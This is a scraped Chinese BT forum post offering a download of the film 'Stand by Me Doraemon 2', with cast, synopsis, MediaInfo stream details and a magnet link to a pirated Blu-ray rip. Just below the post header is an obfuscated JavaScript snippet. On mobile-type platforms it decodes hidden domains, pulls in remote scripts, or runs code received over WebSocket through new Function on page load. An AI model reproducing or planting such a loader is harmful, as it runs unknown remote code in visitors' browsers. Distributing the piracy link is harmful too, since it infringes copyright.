哆啦A梦:伴我同行2[简繁字幕].Stand.by.Me.Doraemon.2.2020.BluRay.1080p.迅雷下载 8.15GB

版主小s 1月前 211

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

image.png

◎译 名 哆啦A梦:伴我同行2/Doraemon 3D: Stand by Me 2/Stand by Me Doraemon 2/与我同行的哆啦A梦2/小叮当:伴我同行2/机器猫:伴我同行2

◎片 名 STAND BY ME ドラえもん2

◎年 代 2020

◎产 地 日本

◎类 别 剧情 / 动画

◎语 言 日语

◎上映日期 2020-11-20(日本) / 2021-05-28(中国大陆)

◎豆瓣评分 7.3/10 from 55531 users

◎豆瓣链接 https://movie.douban.com/subject/34913671/

◎片 长 96分钟

◎导 演 八木龙一 Ryuichi Yagi / 山崎贵 Takashi Yamazaki

◎编 剧 山崎贵 Takashi Yamazaki / 藤子·F·不二雄 F. Fujio Fujiko

◎主 演 水田山葵 Wasabi Mizuta

大原惠美 Megumi Oohara

嘉数由美 Yumi Kakazu

木村昴 Subaru Kimura

关智一 Tomokazu Seki

妻夫木聪 Satoshi Tsumabuki

宫本信子 Nobuko Miyamoto

三石琴乃 Kotono Mitsuishi

松本保典 Yasunori Matsumoto

笨蛋节奏 Bakarhythm

羽鸟慎一 Shinichi Hatori

◎标 签 哆啦A梦 | 温情 | 日本 | 日本动画 | 动画 | 动漫 | 剧场版 | 电影

◎简 介

某天,大雄(大原惠美 配音)偶然发现了童年时奶奶为自己缝制的玩偶熊,于是央求哆啦A梦(水田山葵 配音)去往过去看望已不再人世的奶奶(宫本信子 配音),大雄与奶奶重逢之后,奶奶希望能看到大雄长大结婚时的样子,答应奶奶的大雄与哆啦A梦则再一次的返回了未来,婚礼如期举行的那天,所有人都到了场,但最重要的新郎成年大雄(妻夫木聪 配音)居然不在现场,情急之下,哆啦A梦让大雄假扮成年时的自己与静香结婚(嘉数由美 配音),然而真正的成年大雄究竟去了哪里呢?

◎获奖情况

第44届日本电影学院奖 ?(2021)

最佳动画片(提名)

  1. General

  2. Unique ID : 247373705266337597359420955596930321588 (0xBA1A7151074943074CDE5178BE9A8CB4)

  3. Complete name : Stand.by.Me.Doraemon.2.2020.BluRay.1080p.TrueHD5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.15 GiB

  7. Duration : 1 h 35 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 12.2 Mb/s

  10. Encoded date : UTC 2021-07-03 11:22:53

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 35 min

  20. Bit rate : 8 215 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 038 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.172

  30. Stream size : 5.50 GiB (67%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 8215 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1038 / interlace=0 / total-frames=137832 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : MLP FBA

  44. Format/Info : Meridian Lossless Packing FBA

  45. Commercial name : Dolby TrueHD

  46. Codec ID : A_TRUEHD

  47. Duration : 1 h 35 min

  48. Bit rate mode : Variable

  49. Bit rate : 2 968 kb/s

  50. Maximum bit rate : 4 557 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 1 200.000 FPS (40 SPF)

  55. Compression mode : Lossless

  56. Stream size : 1.99 GiB (24%)

  57. Title : Japanese Dolby TrueHD 5.1 @ 3608 kbps

  58. Language : Japanese

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 35 min

  68. Bit rate mode : Constant

  69. Bit rate : 640 kb/s

  70. Channel(s) : 6 channels

  71. Channel layout : L R C LFE Ls Rs

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 439 MiB (5%)

  76. Title : Japanese Dolby Digital Audio 5.1 @ 640 kbps

  77. Language : Japanese

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Text #1

  82. ID : 4

  83. Format : PGS

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 34 min

  87. Bit rate : 248 kb/s

  88. Count of elements : 9813

  89. Stream size : 168 MiB (2%)

  90. Title : Jpn/SUP

  91. Language : Japanese

  92. Default : No

  93. Forced : No


  94. Text #2

  95. ID : 5

  96. Format : PGS

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 31 min

  100. Bit rate : 22.2 kb/s

  101. Count of elements : 2738

  102. Stream size : 14.4 MiB (0%)

  103. Title : Chs/SUP 简体

  104. Language : Chinese

  105. Default : Yes

  106. Forced : No


  107. Text #3

  108. ID : 6

  109. Format : PGS

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 31 min

  113. Bit rate : 22.9 kb/s

  114. Count of elements : 2738

  115. Stream size : 14.9 MiB (0%)

  116. Title : Cht/SUP 繁体

  117. Language : Chinese

  118. Default : No

  119. Forced : No


  120. Menu

  121. 00:00:00.000 : en:第 01 章

  122. 00:09:20.685 : en:第 02 章

  123. 00:18:26.772 : en:第 03 章

  124. 00:25:20.477 : en:第 04 章

  125. 00:38:59.003 : en:第 05 章

  126. 00:55:00.088 : en:第 06 章

  127. 01:12:11.702 : en:第 07 章

  128. 01:19:50.327 : en:第 08 章

  129. 01:27:31.163 : en:第 09 章

  130. 01:31:47.210 : en:第 10 章


TAGS 剧情 动画

磁力链:
  • magnet:?xt=urn:btih:834BF4D9460E6AF570D22E70D2AC05706B35F7D7
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回